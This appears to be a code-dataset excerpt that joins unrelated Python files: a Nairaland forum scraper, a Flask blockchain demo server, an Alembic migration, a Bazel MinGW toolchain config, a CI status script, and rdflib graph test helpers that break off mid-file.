last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
if 'views' in new_text:
second_split = new_text.split(' views. ')
else:
second_split = new_text.split(' view. ')
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def new_topics(self, page=0):
url = self.BASE_URL+'/topics'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
bs = beautiful.find_all('b')
if not len(bs):
continue
category = bs[0]
a = category.find('a')
datum['category'] = {}
datum['category']['url'] = self.BASE_URL+a['href']
datum['category']['name'] = a.text
topic = bs[1]
b = topic.find('a')
datum['title'] = b.text
datum['url'] = self.BASE_URL+b['href']
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
span = beautiful.find('span')
bs = span.find_all('b')
creator = bs[0]
ac = creator.find('a')
datum['creator'] = {}
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
datum['posts'] = bs[1].text
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
ass = span.find_all('a')
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
if 'views' in new_text:
second_split = new_text.split(' views. ')
else:
second_split = new_text.split(' view. ')
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def recent_posts(self, page=0):
url = self.BASE_URL+'/recent'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
headings = beautiful.find_all("td", class_="bold l pu")
posts = beautiful.find_all("td", class_="l w pd")
# print(f'[BeautifulSoup] Found {len(posts)} posts.')
trending['data'] = []
for l in range(len(posts)):
# if keyword not in posts[l].text:
# continue
data = {}
data['content'] = posts[l].text
try:
p = posts[l].find('p')
bs = p.find_all('b')
data['likes'] = int(bs[0].text)
data['shares'] = int(bs[1].text)
except:
data['likes'] = 0
data['shares'] = 0
a_s = headings[l].find_all('a')
# get date time
try:
span = headings[l].find('span')
split = span.text
data['date_posted'] = str(dateparser.parse(split.rstrip()))
except:
data['date_posted'] = None
data['user'] = {}
data['topic'] = {}
data['topic']['category'] = {}
for a in a_s:
if a.has_attr('class'):
data['user']['url'] = self.BASE_URL+ str(a['href'])
data['user']['name'] = a.text
continue
if a.has_attr('href'):
if '#' in a['href']:
data['topic']['url'] = self.BASE_URL + str(a['href'])
splitted = a['href'].split('/')
data['topic']['id'] = splitted[1]
data['topic']['title'] = a.text.replace('Re: ', '')
split = data['topic']['url'].split('#')
data['url'] = split[0]
data['id'] = split[1]
else:
data['topic']['category']['url'] = self.BASE_URL+a['href']
data['topic']['category']['name'] = a.text
continue
trending['data'].append(data)
return trending
def user(self, username):
url = self.BASE_URL+'/'+username
browser = self.browser
browser.get_url(url)
user = {}
user['name'] = username
user['url'] = url
user['sections_most_active_in'] = []
board = browser.driver.find_element_by_xpath('/html/body/div/table[3]')
followers = browser.driver.find_element_by_xpath('/html/body/div/table[4]')
ps = board.find_elements_by_tag_name('p')
follows = followers.find_elements_by_tag_name('a')
user['follower_count'] = len(follows)
user['followers'] = []
for follow in follows:
datum = {}
datum['name'] = follow.text
datum['url'] = follow.get_attribute('href')
user['followers'].append(datum)
user['gender'] = None
user['location'] = None
user['twitter'] = None
user['personal_text'] = None
user['time_spent_online'] = None
user['time_registered'] = None
user['signature'] = None
user['post_count'] = None
user['topic_count'] = None
for p in ps:
if 'Gender' in p.text:
user['gender'] = p.text.replace('Gender: ', '').strip()
if 'Location' in p.text:
user['location'] = p.text.replace('Location: ', '').strip()
if 'Twitter' in p.text:
user['twitter'] = p.text.replace('Twitter: ', '').strip()
if 'Personal text' in p.text:
user['personal_text'] = p.text.replace('Personal text: ', '').strip()
if 'Time registered' in p.text:
user['time_registered'] = str(dateparser.parse(p.text.replace('Time registered: ', '').strip()))
if 'Last seen' in p.text:
user['last_seen'] = str(dateparser.parse(p.text.replace('Last seen: ', '').strip()))
if 'Time spent online' in p.text:
user['time_spent_online'] = p.text.replace('Time spent online: ', '').strip()
if 'Signature' in p.text:
user['signature'] = p.text.replace('Signature: ', '').strip()
if 'Sections Most Active In: ' in p.text:
beautiful = BeautifulSoup(p.get_attribute('innerHTML'), 'lxml')
anchors = beautiful.find_all('a')
for a in anchors:
section = {}
section['url'] = self.BASE_URL+a['href']
section['name'] = a.text
user['sections_most_active_in'].append(section)
if p.find_elements_by_tag_name('a'):
liinks = p.find_elements_by_tag_name('a')
for li in liinks:
if 'posts' in li.text:
user['post_count'] = li.text.split('(')[1].split(')')[0]
if 'topics' in li.text:
user['topic_count'] = li.text.split('(')[1].split(')')[0]
return {'data': user}
def user_posts(self, username, page=0):
url = self.BASE_URL+'/'+username+'/posts'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
headings = beautiful.find_all("td", class_="bold l pu")
posts = beautiful.find_all("td", class_="l w pd")
# print(f'[BeautifulSoup] Found {len(posts)} posts.')
trending['data'] = []
for l in range(len(posts)):
# if keyword not in posts[l].text:
# continue
data = {}
data['content'] = posts[l].text
try:
p = posts[l].find('p')
bs = p.find_all('b')
data['likes'] = int(bs[0].text)
data['shares'] = int(bs[1].text)
except:
data['likes'] = 0
data['shares'] = 0
a_s = headings[l].find_all('a')
# get date time
try:
span = headings[l].find('span')
split = span.text
data['date_posted'] = str(dateparser.parse(split.rstrip()))
except:
data['date_posted'] = None
data['user'] = {}
data['topic'] = {}
data['topic']['category'] = {}
for a in a_s:
if a.has_attr('class'):
data['user']['url'] = self.BASE_URL + str(a['href'])
data['user']['name'] = a.text
continue
if a.has_attr('href'):
if '#' in a['href']:
data['topic']['url'] = self.BASE_URL + str(a['href'])
splitted = a['href'].split('/')
data['topic']['id'] = splitted[1]
data['topic']['title'] = a.text.replace('Re: ', '')
split = data['topic']['url'].split('#')
data['url'] = split[0]
data['id'] = split[1]
else:
data['topic']['category']['url'] = self.BASE_URL + a['href']
data['topic']['category']['name'] = a.text
continue
trending['data'].append(data)
return trending
def user_topics(self, username, page=0):
url = self.BASE_URL+'/'+username+'/topics'
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
bs = beautiful.find_all('b')
category = bs[0]
a = category.find('a')
datum['category'] = {}
datum['category']['url'] = self.BASE_URL+a['href']
datum['category']['name'] = a.text
topic = bs[1]
b = topic.find('a')
datum['title'] = b.text
datum['url'] = self.BASE_URL+b['href']
span = beautiful.find('span')
bs = span.find_all('b')
ass = span.find_all('a')
ac = ass[0]
datum['creator'] = {}
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
datum['posts'] = bs[1].text
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
second_split = new_text.split(' views. ')
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def category_topics(self, category, page=0):
url = self.BASE_URL+'/'+str(category)
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[4]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[3]')
links = table.find_elements_by_tag_name('td')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
for link in links:
datum = {}
beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
b = beautiful.find('b')
a = b.find('a')
datum['url'] = self.BASE_URL+a['href']
split_list = datum['url'].split('/')
datum['id'] = split_list[3]
datum['title'] = a.text
span = beautiful.find('span')
bs = span.find_all('b')
creator = bs[0]
ac = creator.find('a')
datum['creator'] = {}
if ac:
datum['creator']['name'] = ac.text
datum['creator']['url'] = self.BASE_URL+ac['href']
if len(bs) > 1:
datum['posts'] = bs[1].text
if len(bs) > 2:
datum['views'] = bs[2].text
datum['last_post_time'] = str(dateparser.parse(bs[3].text))
datum['last_post_creator'] = {}
ass = span.find_all('a')
if len(ass) > 1:
lc = ass[1]
datum['last_post_creator']['name'] = lc.text
datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
whole_text = span.text
first_split = whole_text.split(' ')
last_element = first_split[len(first_split)-1]
new_text = whole_text.replace(last_element, '')
second_split = new_text.split(' views. ')
if len(second_split) > 1:
datum['last_post_time'] = str(dateparser.parse(second_split[1]))
trending['data'].append(datum)
return trending
def topic_posts(self, slug_id, page=0):
url = self.BASE_URL+'/'+str(slug_id)
if page > 0:
url = url+'/'+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
category = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
category_links = category.find_elements_by_tag_name('a')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
splitted = url.split('/')
trending['topic'] = {}
trending['topic']['id'] = splitted[3]
trending['topic']['title'] = browser.driver.title.split('-')[0].strip()
trending['topic']['category'] = {}
cat_a = category_links[len(category_links) - 2]
trending['topic']['category']['name'] = cat_a.text
trending['topic']['category']['url'] = cat_a.get_attribute('href')
beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
headings = beautiful.find_all("td", class_="bold l pu")
posts = beautiful.find_all("td", class_="l w pd")
# print(f'[BeautifulSoup] Found {len(posts)} posts.')
trending['data'] = []
for l in range(len(posts)):
# if keyword not in posts[l].text:
# continue
data = {}
div = posts[l].find('div')
data['content'] = div.text
try:
p = posts[l].find('p')
bs = p.find_all('b')
data['likes'] = int(bs[0].text)
data['shares'] = int(bs[1].text)
except:
data['likes'] = 0
data['shares'] = 0
a_s = headings[l].find_all('a')
# get date time
try:
span = headings[l].find('span')
split = span.text
data['date_posted'] = str(dateparser.parse(split.rstrip()))
except:
data['date_posted'] = None
data['user'] = {}
for a in a_s:
if a.has_attr('class'):
data['user']['url'] = self.BASE_URL + str(a['href'])
data['user']['name'] = a.text
continue
trending['data'].append(data)
return trending
def search(self, search_term, board=0, page=0):
if page > 0:
url = "https://www.nairaland.com/search?q=" + search_term + "&board=" + board
else:
url = "https://www.nairaland.com/search/"+search_term+"/0/"+str(board) +"/0/1/"+str(page)
browser = self.browser
browser.get_url(url)
trending = {}
trending['meta'] = {}
pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
links = table.find_elements_by_tag_name('tr')
anchors = pagination.find_elements_by_tag_name('a')
trending['meta'] = {}
trending['keyword'] = search_term
if page < len(anchors):
trending['meta']['next_page'] = page + 1
else:
trending['meta']['next_page'] = page + 1
trending['meta']['page'] = page
trending['meta']['per_page'] = len(links)
if page > 0:
trending['meta']['previous_page'] = page - 1
else:
trending['meta']['previous_page'] = page
trending['meta']['total_pages'] = len(anchors)
trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
trending['data'] = []
beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
headings = beautiful.find_all("td", class_="bold l pu")
posts = beautiful.find_all("td", class_="l w pd")
# print(f'[BeautifulSoup] Found {len(posts)} posts.')
trending['data'] = []
for l in range(len(posts)):
# if keyword not in posts[l].text:
# continue
data = {}
div = posts[l].find('div')
data['content'] = div.text
try:
p = posts[l].find('p')
bs = p.find_all('b')
data['likes'] = int(bs[0].text)
data['shares'] = int(bs[1].text)
except:
data['likes'] = 0
data['shares'] = 0
a_s = headings[l].find_all('a')
# get date time
try:
span = headings[l].find('span')
split = span.text
data['date_posted'] = str(dateparser.parse(split.rstrip()))
except:
data['date_posted'] = None
data['user'] = {}
data['topic'] = {}
data['topic']['category'] = {}
for a in a_s:
if a.has_attr('class'):
data['user']['url'] = self.BASE_URL + str(a['href'])
data['user']['name'] = a.text
continue
if a.has_attr('href'):
if '#' in a['href']:
data['url'] = self.BASE_URL + str(a['href'])
splitted = a['href'].split('/')
data['topic']['id'] = splitted[1]
data['topic']['title'] = a.text.replace('Re: ', '')
split = data['url'].split('#')
data['topic']['url'] = split[0]
data['id'] = split[1]
else:
data['topic']['category']['url'] = self.BASE_URL + a['href']
data['topic']['category']['name'] = a.text
continue
trending['data'].append(data)
return trending
| StarcoderdataPython |
3219581 | #!/usr/bin/env python3
"""
blockchain_db_server.py - BlockchainDB Server
Author: <NAME> (<EMAIL>)
Date: 12/5/2017
"""
from flask import Flask, jsonify, render_template
from uuid import uuid4
from random import randint
import random
from blockchain_db import BlockchainDB
app = Flask(__name__)
blockchain_db_manager = BlockchainDB()
@app.route('/', methods=['GET'])
def hello_world():
"""
Welcome to Blockchain message
:return: HTML
"""
response = {
'header': 'Welcome to BlockchainDB'
}
return render_template('landing.html', data=response)
@app.route('/reset', methods=['GET'])
def reset():
"""
Drop the database and start all over again by creating the genesis block.
Run once when start, or whenever you feel like dropping!
:return: HTML
"""
blockchain_db_manager.reset()
response = {
'header': 'Successfully generated a genesis block'
}
return render_template('landing.html', data=response)
@app.route('/mine/<int:number>', methods=['GET'])
def mine_blocks(number):
"""
Mine for a some number of blocks with random generated transactions.
:return: HTML
"""
transactions_range = randint(1, 10)
for i in range(number):
for transaction in range(transactions_range):
blockchain_db_manager.add_transaction(sender=(str(uuid4()).replace('-', '')[:-10]),
recipient=(str(uuid4()).replace('-', '')[:-10]),
amount=round(random.uniform(1, 10), 2))
blockchain_db_manager.mine_for_next_block()
response = {
'header': 'Successfully mined {0} blocks'.format(number)
}
return render_template('landing.html', data=response)
@app.route('/view/chain', methods=['GET'])
def view_blockchain():
"""
View the full BlockChain.
:return: HTML
"""
response = {
'chain': blockchain_db_manager.get_all_blocks(),
'length': blockchain_db_manager.get_length(),
'header': 'Full chain'
}
return render_template('chain.html', data=response)
@app.route('/view/last_blocks/<int:number>', methods=['GET'])
def view_last_n_block(number):
"""
View the last number of mined blocks.
:param number: Number of blocks
:return: HTML
"""
# Reverse order to display latest ones to oldest one
temp = []
blocks = blockchain_db_manager.get_last_n_blocks(number)
for i in range(number - 1, -1, -1):
temp.append(blocks[i])
response = {
'chain': temp,
'length': number,
'header': 'Last {0} Blocks'.format(number)
}
return render_template('chain.html', data=response)
@app.route('/view/last_block', methods=['GET'])
def view_last_block():
"""
View the last block.
:return: HTML
"""
response = {
'chain': [blockchain_db_manager.get_last_block()],
'length': 1,
'header': 'Last Block'
}
return render_template('chain.html', data=response)
@app.route('/view/genesis_block', methods=['GET'])
def view_genesis_block():
"""
View the genesis block.
:return: HTML
"""
response = {
'chain': [blockchain_db_manager.get_genesis_block()],
'length': 1,
'header': 'Genesis Block'
}
return render_template('chain.html', data=response)
@app.route('/view/block/<int:number>', methods=['GET'])
def view_block(number):
"""
View a specific block for a given height number.
:param number: Block height
:return: HTML
"""
response = {
'chain': [blockchain_db_manager.get_block(number)],
'length': 1,
'header': 'Block {0}'.format(number)
}
return render_template('chain.html', data=response)
@app.route('/view/top/<int:number>/<string:state>', methods=['GET'])
def view_top_blocks(number, state):
"""
View a number of top blocks for a given state.
:param number: Number of blocks
:param state: difficulty | elapsed_time | block_reward | hash_power | height | nonce | number_of_transaction
:return: HTML
"""
# Reverse order to display latest ones to oldest one
temp = []
blocks = blockchain_db_manager.get_top_blocks(state=state, number=number)
for i in range(number - 1, -1, -1):
temp.append(blocks[i])
response = {
'chain': temp,
'length': number,
'header': 'Top {0} {1}'.format(number, state)
}
return render_template('chain.html', data=response)
if __name__ == '__main__':
app.run() | StarcoderdataPython |
128410 | def first_last(full_name):
first_name = ''
last_name = ''
has_been_a_space = False
for letter in full_name:
if letter == ' ':
has_been_a_space = True
elif has_been_a_space:
last_name = last_name + letter
else:
first_name = first_name + letter
print('First: ', first_name)
print('Last: ', last_name)
first_last('<NAME>')
| StarcoderdataPython |
3261897 | """adding valuable tokens to article
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-05-10 16:13:43.117796
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('article',
sa.Column('valuable_tokens', sa.PickleType(), nullable=True))
def downgrade():
with op.batch_alter_table('article') as batch_op:
batch_op.drop_column('valuable_tokens')
| StarcoderdataPython |
3271539 | <filename>BrAinPI/old/test_mem_tiff.py
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 2 21:16:30 2022
@author: alpha
"""
import io
from skimage import img_as_uint
import numpy as np
import tifffile as tf
import tempfile
image = np.random.random((10,10))
image = img_as_uint(image)
img_ram = io.BytesIO()
tf.imwrite(img_ram,image)
img_ram = bytearray(img_ram.getvalue())
tf.imread(io.BytesIO(img_ram))
| StarcoderdataPython |
3252055 | # NEW
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
# NEW
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"artifact_name_pattern",
"feature",
"flag_group",
"flag_set",
"tool_path",
)
def mingw_directories(mingw_version):
return [
"C:/MinGW/include",
"C:/MinGW/mingw32/include",
"C:/MinGW/lib/gcc/mingw32/%s/include-fixed" % mingw_version,
"C:/MinGW/lib/gcc/mingw32/%s/include" % mingw_version,
"C:/MinGW/lib/gcc/mingw32/%s" % mingw_version,
]
all_link_actions = [
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
def _impl(ctx):
cxx_builtin_include_directories = ctx.attr.builtin_include_directories
tool_paths = [
tool_path(
name = "gcc",
path = "C:/MinGW/bin/gcc",
),
tool_path(
name = "ld",
path = "C:/MinGW/bin/ld",
),
tool_path(
name = "ar",
path = "C:/MinGW/bin/ar",
),
tool_path(
name = "cpp",
path = "C:/MinGW/bin/cpp",
),
tool_path(
name = "gcov",
path = "C:/MinGW/bin/gcov",
),
tool_path(
name = "nm",
path = "C:/MinGW/bin/nm",
),
tool_path(
name = "objdump",
path = "C:/MinGW/bin/objdump",
),
tool_path(
name = "strip",
path = "C:/MinGW/bin/strip",
),
]
features = [
feature(
name = "default_linker_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([
flag_group(
flags = [
"-lstdc++",
],
),
]),
),
],
),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = "local",
host_system_name = "local",
target_system_name = "local",
target_cpu = "x64_windows",
target_libc = "unknown",
compiler = "gcc",
abi_version = "unknown",
abi_libc_version = "unknown",
tool_paths = tool_paths,
artifact_name_patterns = [
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
],
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"builtin_include_directories": attr.string_list(
doc = "Default include paths",
),
},
provides = [CcToolchainConfigInfo],
)
| StarcoderdataPython |
129114 | # from . import quantities
# from . import numpy_attributes
| StarcoderdataPython |
3246791 | <reponame>scottviteri/verified-betrfs
#!/usr/bin/env python3
# Copyright 2018-2021 VMware, Inc., Microsoft Inc., Carnegie Mellon University, ETH Zurich, and University of Washington
# SPDX-License-Identifier: BSD-2-Clause
import os
import shutil
import subprocess
import sys
def callOrDie(*kargs):
rc = subprocess.call(*kargs)
if rc!=0:
raise Exception("%s call failed" % kargs[0])
def main():
os.chdir("../continuous-integration")
result = subprocess.Popen(["git", "status"], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
if "nothing to commit, working tree clean" not in result:
raise Exception("Git unclean; git commit hash label would be a lie.")
githash = subprocess.Popen(["git", "rev-parse", "HEAD"], stdout=subprocess.PIPE).communicate()[0].strip().decode('utf-8')
callOrDie(["make", "-C", "../disk-betree", "status"])
os.mkdir(githash)
shutil.copy("../build/disk-betree/Bundle.i.status.pdf", githash)
callOrDie(["git", "add", githash])
callOrDie(["git", "commit", "-m", "CI Status Report"])
callOrDie(["git", "push"])
main()
| StarcoderdataPython |
3281277 | <gh_stars>0
from __future__ import print_function
import datetime
import email.message
import os
import random
import sys
import unittest
from contextlib import AbstractContextManager, contextmanager
from http.server import BaseHTTPRequestHandler, HTTPServer, SimpleHTTPRequestHandler
from pathlib import PurePath, PureWindowsPath
from threading import Thread
from traceback import print_exc
from types import TracebackType
from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Dict,
Generator,
Iterable,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
cast,
)
from unittest.mock import MagicMock, Mock
from urllib.error import HTTPError
from urllib.parse import ParseResult, parse_qs, unquote, urlparse
from urllib.request import urlopen
import isodate
import pytest
from _pytest.mark.structures import Mark, MarkDecorator, ParameterSet
from nturl2path import url2pathname as nt_url2pathname
import rdflib.compare
import rdflib.plugin
from rdflib import BNode, ConjunctiveGraph, Graph
from rdflib.plugin import Plugin
from rdflib.term import Identifier, Literal, Node, URIRef
PluginT = TypeVar("PluginT")
def get_unique_plugins(
type: Type[PluginT],
) -> Dict[Type[PluginT], Set[Plugin[PluginT]]]:
result: Dict[Type[PluginT], Set[Plugin[PluginT]]] = {}
for plugin in rdflib.plugin.plugins(None, type):
cls = plugin.getClass()
plugins = result.setdefault(cls, set())
plugins.add(plugin)
return result
def get_unique_plugin_names(type: Type[PluginT]) -> Set[str]:
result: Set[str] = set()
unique_plugins = get_unique_plugins(type)
for type, plugin_set in unique_plugins.items():
result.add(next(iter(plugin_set)).name)
return result
if TYPE_CHECKING:
import typing_extensions as te
def get_random_ip(parts: List[str] = None) -> str:
if parts is None:
parts = ["127"]
for _ in range(4 - len(parts)):
parts.append(f"{random.randint(0, 255)}")
return ".".join(parts)
@contextmanager
def ctx_http_server(
handler: Type[BaseHTTPRequestHandler], host: str = "127.0.0.1"
) -> Iterator[HTTPServer]:
server = HTTPServer((host, 0), handler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
yield server
server.shutdown()
server.socket.close()
server_thread.join()
IdentifierTriple = Tuple[Identifier, Identifier, Identifier]
IdentifierTripleSet = Set[IdentifierTriple]
IdentifierQuad = Tuple[Identifier, Identifier, Identifier, Identifier]
IdentifierQuadSet = Set[IdentifierQuad]
class GraphHelper:
"""
Provides methods which are useful for working with graphs.
"""
@classmethod
def identifier(self, node: Node) -> Identifier:
"""
Return the identifier of the provided node.
"""
if isinstance(node, Graph):
return node.identifier
else:
return cast(Identifier, node)
@classmethod
def identifiers(cls, nodes: Tuple[Node, ...]) -> Tuple[Identifier, ...]:
"""
Return the identifiers of the provided nodes.
"""
result = []
for node in nodes:
result.append(cls.identifier(node))
return tuple(result)
@classmethod
def triple_set(
cls, graph: Graph, exclude_blanks: bool = False
) -> IdentifierTripleSet:
result = set()
for sn, pn, on in graph.triples((None, None, None)):
s, p, o = cls.identifiers((sn, pn, on))
if exclude_blanks and (
isinstance(s, BNode) or isinstance(p, BNode) or isinstance(o, BNode)
):
continue
result.add((s, p, o))
return result
@classmethod
def triple_sets(
cls, graphs: Iterable[Graph], exclude_blanks: bool = False
) -> List[IdentifierTripleSet]:
"""
Extracts the set of all triples from the supplied Graph.
"""
result: List[IdentifierTripleSet] = []
for graph in graphs:
result.append(cls.triple_set(graph, exclude_blanks))
return result
@classmethod
def quad_set(
cls, graph: ConjunctiveGraph, exclude_blanks: bool = False
) -> IdentifierQuadSet:
"""
Extracts the set of all quads from the supplied ConjunctiveGraph.
"""
result = set()
for sn, pn, on, gn in graph.quads((None, None, None, None)):
s, p, o, g = cls.identifiers((sn, pn, on, gn))
if exclude_blanks and (
isinstance(s, BNode)
or isinstance(p, BNode)
or isinstance(o, BNode)
or isinstance(g, BNode)
):
continue
result.add((s, p, o, g))
return result
@classmethod
def triple_or_quad_set(
cls, graph: Graph, exclude_blanks: bool = False
) -> Union[IdentifierQuadSet, IdentifierTripleSet]:
"""
Extracts quad or triple sets depending on whether or not the graph is
ConjunctiveGraph or a normal Graph.
"""
if isinstance(graph, ConjunctiveGraph):
return cls.quad_set(graph, exclude_blanks)
return cls.triple_set(graph, exclude_blanks)
@classmethod
def assert_triple_sets_equals(
cls, lhs: Graph, rhs: Graph, exclude_blanks: bool = False
) -> None:
"""
Asserts that the triple sets in the two graphs are equal.
"""
lhs_set = cls.triple_set(lhs, exclude_blanks)
rhs_set = cls.triple_set(rhs, exclude_blanks)
assert lhs_set == rhs_set
@classmethod
def assert_quad_sets_equals(
cls, lhs: ConjunctiveGraph, rhs: ConjunctiveGraph, exclude_blanks: bool = False
) -> None:
"""
Asserts that the quads sets in the two graphs are equal.
"""
lhs_set = cls.quad_set(lhs, exclude_blanks)
rhs_set = cls.quad_set(rhs, exclude_blanks)
assert lhs_set == rhs_set
@classmethod
def assert_sets_equals(
cls, lhs: Graph, rhs: Graph, exclude_blanks: bool = False
) -> None:
"""
Asserts that that ther quad or triple sets from the two graphs are equal.
"""
lhs_set = cls.triple_or_quad_set(lhs, exclude_blanks)
rhs_set = cls.triple_or_quad_set(rhs, exclude_blanks)
assert lhs_set == rhs_set
@classmethod
def format_set(
cls,
item_set: Union[IdentifierQuadSet, IdentifierTripleSet],
prefix: str = " ",
sort: bool = False,
) -> str:
items = []
use_item_set = sorted(item_set) if sort else item_set
for item in use_item_set:
items.append(f"{prefix}{item}")
return "\n".join(items)
@classmethod
def format_graph_set(
cls, graph: Graph, prefix: str = " ", sort: bool = False
) -> str:
return cls.format_set(cls.triple_or_quad_set(graph), prefix, sort)
@classmethod
def assert_isomorphic(
cls, lhs: Graph, rhs: Graph, message: Optional[str] = None
) -> None:
"""
